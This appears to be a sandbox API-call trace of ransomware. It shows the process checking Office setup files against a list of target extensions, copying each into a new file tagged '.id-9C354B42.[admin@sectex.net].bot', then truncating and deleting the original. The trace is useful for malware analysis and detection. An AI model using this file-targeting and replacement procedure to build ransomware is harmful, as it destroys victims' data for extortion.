	[0039.731] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Visio.en-us\\VisioMUI.XML") returned 104
	[0039.731] lstrlenW (lpString=".jpg") returned 4
	[0039.732] lstrcmpiW (lpString1=".jpg", lpString2=".XML") returned -1
	[0039.732] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Visio.en-us\\VisioMUI.XML") returned 104
	[0039.732] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Visio.en-us\\VisioMUI.XML") returned 104
	[0039.732] lstrlenW (lpString=".doc") returned 4
	[0039.732] lstrcmpiW (lpString1=".doc", lpString2=".XML") returned -1
	[0039.732] lstrlenW (lpString=".docx") returned 5
	[0039.732] lstrcmpiW (lpString1=".docx", lpString2="I.XML") returned -1
	[0039.732] lstrlenW (lpString=".pdf") returned 4
	[0039.732] lstrcmpiW (lpString1=".pdf", lpString2=".XML") returned -1
	[0039.732] lstrlenW (lpString=".xls") returned 4
	[0039.732] lstrcmpiW (lpString1=".xls", lpString2=".XML") returned -1
	[0039.732] lstrlenW (lpString=".xlsx") returned 5
	[0039.732] lstrcmpiW (lpString1=".xlsx", lpString2="I.XML") returned -1
	[0039.732] lstrlenW (lpString=".ppt") returned 4
	[0039.732] lstrcmpiW (lpString1=".ppt", lpString2=".XML") returned -1
	[0039.732] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Visio.en-us\\VisioMUI.XML") returned 104
	[0039.732] lstrlenW (lpString=".zip") returned 4
	[0039.732] lstrcmpiW (lpString1=".zip", lpString2=".XML") returned 1
	[0039.732] lstrlenW (lpString=".rar") returned 4
	[0039.732] lstrcmpiW (lpString1=".rar", lpString2=".XML") returned -1
	[0039.732] lstrlenW (lpString=".bz2") returned 4
	[0039.732] lstrcmpiW (lpString1=".bz2", lpString2=".XML") returned -1
	[0039.732] lstrlenW (lpString=".7z") returned 3
	[0039.732] lstrcmpiW (lpString1=".7z", lpString2="XML") returned -1
	[0039.732] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Visio.en-us\\VisioMUI.XML") returned 104
	[0039.732] lstrlenW (lpString=".dbf") returned 4
	[0039.732] lstrcmpiW (lpString1=".dbf", lpString2=".XML") returned -1
	[0039.732] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Visio.en-us\\VisioMUI.XML") returned 104
	[0039.732] lstrlenW (lpString=".1cd") returned 4
	[0039.732] lstrcmpiW (lpString1=".1cd", lpString2=".XML") returned -1
	[0039.732] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Visio.en-us\\VisioMUI.XML") returned 104
	[0039.732] lstrlenW (lpString=".jpg") returned 4
	[0039.732] lstrcmpiW (lpString1=".jpg", lpString2=".XML") returned -1
	[0039.733] lstrcmpiW (lpString1=".XML", lpString2=".bot") returned 1
	[0039.733] lstrlenW (lpString="SETUP.XML") returned 9
	[0039.733] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\VISIOR\\SETUP.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\visior\\setup.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b0
	[0039.734] GetFileSizeEx (in: hFile=0x1b0, lpFileSize=0xa69ff1c | out: lpFileSize=0xa69ff1c*=20577) returned 1
	[0039.734] CloseHandle (hObject=0x1b0) returned 1
	[0039.734] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\VISIOR\\SETUP.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\visior\\setup.xml")) returned 0x20
	[0039.734] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\VISIOR\\SETUP.XML.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\visior\\setup.xml.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0039.734] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\VISIOR\\SETUP.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\visior\\setup.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b0
	[0039.734] SetFilePointerEx (in: hFile=0x1b0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa69fec8 | out: lpNewFilePointer=0x0) returned 1
	[0039.734] SetFilePointerEx (in: hFile=0x1b0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa69fec8 | out: lpNewFilePointer=0x0) returned 1
	[0039.734] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\VISIOR\\SETUP.XML.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\visior\\setup.xml.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1c0
	[0039.734] GetLastError () returned 0x0
	[0039.735] ReadFile (in: hFile=0x1b0, lpBuffer=0xb1c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa69fed4, lpOverlapped=0x0 | out: lpBuffer=0xb1c0020*, lpNumberOfBytesRead=0xa69fed4*=0x5061, lpOverlapped=0x0) returned 1
	[0039.736] WriteFile (in: hFile=0x1c0, lpBuffer=0xb1c0020*, nNumberOfBytesToWrite=0x5070, lpNumberOfBytesWritten=0xa69fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb1c0020*, lpNumberOfBytesWritten=0xa69fc9c*=0x5070, lpOverlapped=0x0) returned 1
	[0039.737] ReadFile (in: hFile=0x1b0, lpBuffer=0xb1c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa69fed4, lpOverlapped=0x0 | out: lpBuffer=0xb1c0020*, lpNumberOfBytesRead=0xa69fed4*=0x0, lpOverlapped=0x0) returned 1
	[0039.738] WriteFile (in: hFile=0x1c0, lpBuffer=0xb1c0020*, nNumberOfBytesToWrite=0xe6, lpNumberOfBytesWritten=0xa69fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb1c0020*, lpNumberOfBytesWritten=0xa69fc9c*=0xe6, lpOverlapped=0x0) returned 1
	[0039.738] SetEndOfFile (hFile=0x1c0) returned 1
	[0039.738] CloseHandle (hObject=0x1c0) returned 1
	[0039.739] SetFilePointerEx (in: hFile=0x1b0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa69fec8 | out: lpNewFilePointer=0x0) returned 1
	[0039.739] SetEndOfFile (hFile=0x1b0) returned 1
	[0039.910] CloseHandle (hObject=0x1b0) returned 1
	[0039.910] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\VISIOR\\SETUP.XML.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0039.910] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\VISIOR\\SETUP.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\visior\\setup.xml")) returned 1
	[0039.910] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\VISIOR\\SETUP.XML") returned 96
	[0039.910] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\VISIOR\\SETUP.XML") returned 96
	[0039.910] lstrlenW (lpString=".doc") returned 4
	[0039.910] lstrcmpiW (lpString1=".doc", lpString2=".XML") returned -1
	[0039.911] lstrlenW (lpString=".docx") returned 5
	[0039.911] lstrcmpiW (lpString1=".docx", lpString2="P.XML") returned -1
	[0039.911] lstrlenW (lpString=".pdf") returned 4
	[0039.911] lstrcmpiW (lpString1=".pdf", lpString2=".XML") returned -1
	[0039.911] lstrlenW (lpString=".xls") returned 4
	[0039.911] lstrcmpiW (lpString1=".xls", lpString2=".XML") returned -1
	[0039.911] lstrlenW (lpString=".xlsx") returned 5
	[0039.911] lstrcmpiW (lpString1=".xlsx", lpString2="P.XML") returned -1
	[0039.911] lstrlenW (lpString=".ppt") returned 4
	[0039.911] lstrcmpiW (lpString1=".ppt", lpString2=".XML") returned -1
	[0039.911] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\VISIOR\\SETUP.XML") returned 96
	[0039.911] lstrlenW (lpString=".zip") returned 4
	[0039.911] lstrcmpiW (lpString1=".zip", lpString2=".XML") returned 1
	[0039.911] lstrlenW (lpString=".rar") returned 4
	[0039.911] lstrcmpiW (lpString1=".rar", lpString2=".XML") returned -1
	[0039.911] lstrlenW (lpString=".bz2") returned 4
	[0039.911] lstrcmpiW (lpString1=".bz2", lpString2=".XML") returned -1
	[0039.911] lstrlenW (lpString=".7z") returned 3
	[0039.911] lstrcmpiW (lpString1=".7z", lpString2="XML") returned -1
	[0039.911] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\VISIOR\\SETUP.XML") returned 96
	[0039.911] lstrlenW (lpString=".dbf") returned 4
	[0039.911] lstrcmpiW (lpString1=".dbf", lpString2=".XML") returned -1
	[0039.911] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\VISIOR\\SETUP.XML") returned 96
	[0039.911] lstrlenW (lpString=".1cd") returned 4
	[0039.911] lstrcmpiW (lpString1=".1cd", lpString2=".XML") returned -1
	[0039.911] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\VISIOR\\SETUP.XML") returned 96
	[0039.911] lstrlenW (lpString=".jpg") returned 4
	[0039.911] lstrcmpiW (lpString1=".jpg", lpString2=".XML") returned -1
	[0039.912] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\VISIOR\\SETUP.XML") returned 96
	[0039.912] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\VISIOR\\SETUP.XML") returned 96
	[0039.912] lstrlenW (lpString=".doc") returned 4
	[0039.912] lstrcmpiW (lpString1=".doc", lpString2=".XML") returned -1
	[0039.912] lstrlenW (lpString=".docx") returned 5
	[0039.912] lstrcmpiW (lpString1=".docx", lpString2="P.XML") returned -1
	[0039.912] lstrlenW (lpString=".pdf") returned 4
	[0039.912] lstrcmpiW (lpString1=".pdf", lpString2=".XML") returned -1
	[0039.912] lstrlenW (lpString=".xls") returned 4
	[0039.912] lstrcmpiW (lpString1=".xls", lpString2=".XML") returned -1
	[0039.912] lstrlenW (lpString=".xlsx") returned 5
	[0039.912] lstrcmpiW (lpString1=".xlsx", lpString2="P.XML") returned -1
	[0039.912] lstrlenW (lpString=".ppt") returned 4
	[0039.912] lstrcmpiW (lpString1=".ppt", lpString2=".XML") returned -1
	[0039.912] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\VISIOR\\SETUP.XML") returned 96
	[0039.912] lstrlenW (lpString=".zip") returned 4
	[0039.912] lstrcmpiW (lpString1=".zip", lpString2=".XML") returned 1
	[0039.912] lstrlenW (lpString=".rar") returned 4
	[0039.912] lstrcmpiW (lpString1=".rar", lpString2=".XML") returned -1
	[0039.912] lstrlenW (lpString=".bz2") returned 4
	[0039.912] lstrcmpiW (lpString1=".bz2", lpString2=".XML") returned -1
	[0039.912] lstrlenW (lpString=".7z") returned 3
	[0039.912] lstrcmpiW (lpString1=".7z", lpString2="XML") returned -1
	[0039.912] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\VISIOR\\SETUP.XML") returned 96
	[0039.912] lstrlenW (lpString=".dbf") returned 4
	[0039.912] lstrcmpiW (lpString1=".dbf", lpString2=".XML") returned -1
	[0039.912] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\VISIOR\\SETUP.XML") returned 96
	[0039.912] lstrlenW (lpString=".1cd") returned 4
	[0039.912] lstrcmpiW (lpString1=".1cd", lpString2=".XML") returned -1
	[0039.912] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\VISIOR\\SETUP.XML") returned 96
	[0039.912] lstrlenW (lpString=".jpg") returned 4
	[0039.912] lstrcmpiW (lpString1=".jpg", lpString2=".XML") returned -1
	[0039.913] lstrcmpiW (lpString1=".XML", lpString2=".bot") returned 1
	[0039.913] lstrlenW (lpString="VisiorWW.XML") returned 12
	[0039.913] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\VISIOR\\VisiorWW.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\visior\\visiorww.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b0
	[0039.913] GetFileSizeEx (in: hFile=0x1b0, lpFileSize=0xa69ff1c | out: lpFileSize=0xa69ff1c*=8723) returned 1
	[0039.913] CloseHandle (hObject=0x1b0) returned 1
	[0039.913] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\VISIOR\\VisiorWW.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\visior\\visiorww.xml")) returned 0x20
	[0039.913] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\VISIOR\\VisiorWW.XML.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\visior\\visiorww.xml.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0039.913] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\VISIOR\\VisiorWW.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\visior\\visiorww.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b0
	[0039.913] SetFilePointerEx (in: hFile=0x1b0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa69fec8 | out: lpNewFilePointer=0x0) returned 1
	[0039.913] SetFilePointerEx (in: hFile=0x1b0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa69fec8 | out: lpNewFilePointer=0x0) returned 1
	[0039.913] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\VISIOR\\VisiorWW.XML.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\visior\\visiorww.xml.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a0
	[0039.951] GetLastError () returned 0x0
	[0039.951] ReadFile (in: hFile=0x1b0, lpBuffer=0xb1c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa69fed4, lpOverlapped=0x0 | out: lpBuffer=0xb1c0020*, lpNumberOfBytesRead=0xa69fed4*=0x2213, lpOverlapped=0x0) returned 1
	[0039.987] WriteFile (in: hFile=0x1a0, lpBuffer=0xb1c0020*, nNumberOfBytesToWrite=0x2220, lpNumberOfBytesWritten=0xa69fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb1c0020*, lpNumberOfBytesWritten=0xa69fc9c*=0x2220, lpOverlapped=0x0) returned 1
	[0039.989] ReadFile (in: hFile=0x1b0, lpBuffer=0xb1c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa69fed4, lpOverlapped=0x0 | out: lpBuffer=0xb1c0020*, lpNumberOfBytesRead=0xa69fed4*=0x0, lpOverlapped=0x0) returned 1
	[0039.989] WriteFile (in: hFile=0x1a0, lpBuffer=0xb1c0020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa69fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb1c0020*, lpNumberOfBytesWritten=0xa69fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0039.989] SetEndOfFile (hFile=0x1a0) returned 1
	[0039.989] CloseHandle (hObject=0x1a0) returned 1
	[0039.990] SetFilePointerEx (in: hFile=0x1b0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa69fec8 | out: lpNewFilePointer=0x0) returned 1
	[0039.990] SetEndOfFile (hFile=0x1b0) returned 1
	[0039.991] CloseHandle (hObject=0x1b0) returned 1
	[0039.991] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\VISIOR\\VisiorWW.XML.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0039.991] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\VISIOR\\VisiorWW.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\visior\\visiorww.xml")) returned 1
	[0039.992] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\VISIOR\\VisiorWW.XML") returned 99
	[0039.992] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\VISIOR\\VisiorWW.XML") returned 99
	[0039.992] lstrlenW (lpString=".doc") returned 4
	[0039.992] lstrcmpiW (lpString1=".doc", lpString2=".XML") returned -1
	[0039.992] lstrlenW (lpString=".docx") returned 5
	[0039.992] lstrcmpiW (lpString1=".docx", lpString2="W.XML") returned -1
	[0039.992] lstrlenW (lpString=".pdf") returned 4
	[0039.992] lstrcmpiW (lpString1=".pdf", lpString2=".XML") returned -1
	[0039.992] lstrlenW (lpString=".xls") returned 4
	[0039.992] lstrcmpiW (lpString1=".xls", lpString2=".XML") returned -1
	[0039.992] lstrlenW (lpString=".xlsx") returned 5
	[0039.992] lstrcmpiW (lpString1=".xlsx", lpString2="W.XML") returned -1
	[0039.992] lstrlenW (lpString=".ppt") returned 4
	[0039.992] lstrcmpiW (lpString1=".ppt", lpString2=".XML") returned -1
	[0039.992] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\VISIOR\\VisiorWW.XML") returned 99
	[0039.992] lstrlenW (lpString=".zip") returned 4
	[0039.992] lstrcmpiW (lpString1=".zip", lpString2=".XML") returned 1
	[0039.992] lstrlenW (lpString=".rar") returned 4
	[0039.992] lstrcmpiW (lpString1=".rar", lpString2=".XML") returned -1
	[0039.992] lstrlenW (lpString=".bz2") returned 4
	[0039.992] lstrcmpiW (lpString1=".bz2", lpString2=".XML") returned -1
	[0039.992] lstrlenW (lpString=".7z") returned 3
	[0039.992] lstrcmpiW (lpString1=".7z", lpString2="XML") returned -1
	[0039.992] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\VISIOR\\VisiorWW.XML") returned 99
	[0039.992] lstrlenW (lpString=".dbf") returned 4
	[0039.993] lstrcmpiW (lpString1=".dbf", lpString2=".XML") returned -1
	[0039.993] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\VISIOR\\VisiorWW.XML") returned 99
	[0039.993] lstrlenW (lpString=".1cd") returned 4
	[0039.993] lstrcmpiW (lpString1=".1cd", lpString2=".XML") returned -1
	[0039.993] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\VISIOR\\VisiorWW.XML") returned 99
	[0039.993] lstrlenW (lpString=".jpg") returned 4
	[0039.993] lstrcmpiW (lpString1=".jpg", lpString2=".XML") returned -1
	[0039.993] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\VISIOR\\VisiorWW.XML") returned 99
	[0039.993] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\VISIOR\\VisiorWW.XML") returned 99
	[0039.993] lstrlenW (lpString=".doc") returned 4
	[0039.993] lstrcmpiW (lpString1=".doc", lpString2=".XML") returned -1
	[0039.993] lstrlenW (lpString=".docx") returned 5
	[0039.993] lstrcmpiW (lpString1=".docx", lpString2="W.XML") returned -1
	[0039.993] lstrlenW (lpString=".pdf") returned 4
	[0039.993] lstrcmpiW (lpString1=".pdf", lpString2=".XML") returned -1
	[0039.993] lstrlenW (lpString=".xls") returned 4
	[0039.993] lstrcmpiW (lpString1=".xls", lpString2=".XML") returned -1
	[0039.993] lstrlenW (lpString=".xlsx") returned 5
	[0039.993] lstrcmpiW (lpString1=".xlsx", lpString2="W.XML") returned -1
	[0039.993] lstrlenW (lpString=".ppt") returned 4
	[0039.993] lstrcmpiW (lpString1=".ppt", lpString2=".XML") returned -1
	[0039.993] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\VISIOR\\VisiorWW.XML") returned 99
	[0039.993] lstrlenW (lpString=".zip") returned 4
	[0039.993] lstrcmpiW (lpString1=".zip", lpString2=".XML") returned 1
	[0039.993] lstrlenW (lpString=".rar") returned 4
	[0039.993] lstrcmpiW (lpString1=".rar", lpString2=".XML") returned -1
	[0039.993] lstrlenW (lpString=".bz2") returned 4
	[0039.993] lstrcmpiW (lpString1=".bz2", lpString2=".XML") returned -1
	[0039.993] lstrlenW (lpString=".7z") returned 3
	[0039.993] lstrcmpiW (lpString1=".7z", lpString2="XML") returned -1
	[0039.993] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\VISIOR\\VisiorWW.XML") returned 99
	[0039.993] lstrlenW (lpString=".dbf") returned 4
	[0039.994] lstrcmpiW (lpString1=".dbf", lpString2=".XML") returned -1
	[0039.994] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\VISIOR\\VisiorWW.XML") returned 99
	[0039.994] lstrlenW (lpString=".1cd") returned 4
	[0039.994] lstrcmpiW (lpString1=".1cd", lpString2=".XML") returned -1
	[0039.994] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\VISIOR\\VisiorWW.XML") returned 99
	[0039.994] lstrlenW (lpString=".jpg") returned 4
	[0039.994] lstrcmpiW (lpString1=".jpg", lpString2=".XML") returned -1
	[0039.994] lstrcmpiW (lpString1=".XML", lpString2=".bot") returned 1
	[0039.994] lstrlenW (lpString="WordMUI.XML") returned 11
	[0039.994] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Word.en-us\\WordMUI.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\word.en-us\\wordmui.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b0
	[0039.994] GetFileSizeEx (in: hFile=0x1b0, lpFileSize=0xa69ff1c | out: lpFileSize=0xa69ff1c*=1800) returned 1
	[0039.994] CloseHandle (hObject=0x1b0) returned 1
	[0039.994] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Word.en-us\\WordMUI.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\word.en-us\\wordmui.xml")) returned 0x20
	[0039.995] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Word.en-us\\WordMUI.XML.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\word.en-us\\wordmui.xml.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0039.995] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Word.en-us\\WordMUI.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\word.en-us\\wordmui.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b0
	[0039.995] SetFilePointerEx (in: hFile=0x1b0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa69fec8 | out: lpNewFilePointer=0x0) returned 1
	[0039.995] SetFilePointerEx (in: hFile=0x1b0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa69fec8 | out: lpNewFilePointer=0x0) returned 1
	[0039.995] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Word.en-us\\WordMUI.XML.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\word.en-us\\wordmui.xml.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a0
	[0040.094] GetLastError () returned 0x0
	[0040.094] ReadFile (in: hFile=0x1b0, lpBuffer=0xb1c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa69fed4, lpOverlapped=0x0 | out: lpBuffer=0xb1c0020*, lpNumberOfBytesRead=0xa69fed4*=0x708, lpOverlapped=0x0) returned 1
	[0040.095] WriteFile (in: hFile=0x1a0, lpBuffer=0xb1c0020*, nNumberOfBytesToWrite=0x710, lpNumberOfBytesWritten=0xa69fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb1c0020*, lpNumberOfBytesWritten=0xa69fc9c*=0x710, lpOverlapped=0x0) returned 1
	[0040.096] ReadFile (in: hFile=0x1b0, lpBuffer=0xb1c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa69fed4, lpOverlapped=0x0 | out: lpBuffer=0xb1c0020*, lpNumberOfBytesRead=0xa69fed4*=0x0, lpOverlapped=0x0) returned 1
	[0040.096] WriteFile (in: hFile=0x1a0, lpBuffer=0xb1c0020*, nNumberOfBytesToWrite=0xea, lpNumberOfBytesWritten=0xa69fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb1c0020*, lpNumberOfBytesWritten=0xa69fc9c*=0xea, lpOverlapped=0x0) returned 1
	[0040.096] SetEndOfFile (hFile=0x1a0) returned 1
	[0040.096] CloseHandle (hObject=0x1a0) returned 1
	[0040.097] SetFilePointerEx (in: hFile=0x1b0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa69fec8 | out: lpNewFilePointer=0x0) returned 1
	[0040.097] SetEndOfFile (hFile=0x1b0) returned 1
	[0040.099] CloseHandle (hObject=0x1b0) returned 1
	[0040.099] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Word.en-us\\WordMUI.XML.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0040.099] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Word.en-us\\WordMUI.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\word.en-us\\wordmui.xml")) returned 1
	[0040.100] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Word.en-us\\WordMUI.XML") returned 102
	[0040.100] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Word.en-us\\WordMUI.XML") returned 102
	[0040.100] lstrlenW (lpString=".doc") returned 4
	[0040.100] lstrcmpiW (lpString1=".doc", lpString2=".XML") returned -1
	[0040.100] lstrlenW (lpString=".docx") returned 5
	[0040.100] lstrcmpiW (lpString1=".docx", lpString2="I.XML") returned -1
	[0040.100] lstrlenW (lpString=".pdf") returned 4
	[0040.100] lstrcmpiW (lpString1=".pdf", lpString2=".XML") returned -1
